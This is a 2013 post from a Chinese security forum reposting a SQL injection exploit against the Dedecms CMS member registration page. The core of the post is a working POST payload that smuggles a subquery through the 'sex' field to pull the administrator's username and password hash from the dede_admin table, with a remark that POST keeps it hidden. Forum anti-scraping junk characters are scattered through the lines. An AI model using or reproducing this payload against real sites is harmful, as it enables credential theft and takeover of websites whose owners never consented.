找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2609|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: SQL注射漏洞
" `$ g' p! I: j6 ~简要描述:
' r4 H: Z2 h6 ]7 h4 a3 y4 f 9 k3 N. t: X) i2 ]/ ?+ f
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
) x  y2 o! O' z( \原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
) H2 a; N1 |& L( E0 }# S. f: C$ o详细说明:跟这个漏洞' y$ T* M- w7 A3 ^8 B7 }

. t1 T- y8 x/ K- r% GWooYun: Dedecms SQL注射导致审核机制绕过漏洞
$ n" ]( Z# L6 D1 X& o5 ]: h. v是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.$ b+ Y9 {+ L  T0 K; }) j, Q2 j/ i0 b
POST提交以下数据,其实不用POST提交的,这样隐蔽点.! T9 b  ~: {5 b9 x

4 a0 F2 N+ F7 Y1 \! |www.political-security.com/member/reg_new.php
) x1 O3 T0 f8 _: n/ ]2 }
, Q/ k+ Q7 ^0 W  C! @3 I7 _POST7 Q- M9 r* |& m" L* d6 G+ U

4 [1 Z" R  e5 u8 Rdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
6 f$ I) C$ }) f# S8 S! y( f4 wuserid=c4rp3nt3r&uname=c4rp3nt3r
# Z) A% v7 g3 J, ?8 x0 O  S% j&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
7 M( i0 ^! B# y. x&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
2 s2 }& @8 S0 s& j, R1 A- f(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');: t1 w6 [* p8 c; ?! l& Q
%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表